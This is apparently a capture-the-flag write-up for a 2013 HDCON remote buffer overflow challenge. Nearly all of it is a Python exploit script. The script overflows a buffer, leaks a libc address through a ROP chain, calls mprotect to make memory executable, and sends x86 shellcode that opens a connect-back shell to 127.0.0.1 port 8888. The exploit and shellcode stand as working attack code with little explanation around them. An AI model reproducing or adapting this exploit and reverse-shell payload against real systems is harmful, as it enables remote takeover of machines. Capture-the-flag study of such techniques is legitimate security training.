2013 HDCON REMOTE BOF

HDCON REMOTE BOF 

Hacked by singi , exploiting & report by 광운

hdconNo5_exp.py

luckyzzang

공격 페이로드는 아래와 같다.

STAGE1 = SEND + PPPR + SOCKFD + GOT_TIME + VALUE_0x4 + NULL + \

              FUNC + AAAA + SOCKFD

STAGE2 = MPROTECT + PPPR + CUSTOM_STACK + SIZEOF_CUSTOM + MODE_EXEC +\

               RECV + RETURN_CUSTOM + SOCKFD + CUSTOM_STACK + SHELLCODELEN + NULL

STAGE3 = SELLCODE

from socket import *

import sys

import struct

SHELLCODE ="\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x66\x68\x22\xb8\x66\xb9\x02\x00\x66\x51\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0\x66\x31\xdb\x43\x43\x43\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"

SHELLCODELEN = struct.pack('<L', len(SHELLCODE))

PLT_SEND = 0x08048610

GOT_TIME = 0x804a004

ADDR_FUNC = 0x080486d4

PPPR = struct.pack('<L', 0x804878d)

PPPPR = struct.pack('<L', 0x80489cc)

STAGE1 = '\x41' * 1036 + struct.pack('<L', PLT_SEND) + PPPPR + '\x04\x00\x00\x00' + struct.pack('<L', GOT_TIME)

STAGE1 += '\x04\x00\x00\x00' + '\x00\x00\x00\x00' +struct.pack('<L', ADDR_FUNC) + '\x41\x41\x41\x41' + '\x04\x00\x00\x00'

if __name__ == '__main__':

s = socket(AF_INET, SOCK_STREAM)

s.connect(('127.0.0.1', 7777))

s.recv(1024)

s.send(STAGE1)

ADDR_TIME = struct.unpack('<L', s.recv(4))[0]

ADDR_MPROTECT = ADDR_TIME + 0x41B70

ADDR_RECV = ADDR_TIME + 0x48080

STAGE2 = '\x41' * 1036 + struct.pack('<L',ADDR_MPROTECT ) + PPPR + '\x00\x80\x04\x08' + '\x00\x10\x00\x00'

STAGE2 += '\x07\x00\x00\x00' + struct.pack('<L', ADDR_RECV) + '\x91\x87\x04\x08' + '\x04\x00\x00\x00'

STAGE2 += '\x91\x87\x04\x08' + SHELLCODELEN + '\x00\x00\x00\x00'

s.recv(1024)

s.send(STAGE2)

s.send(SHELLCODE)

s.close()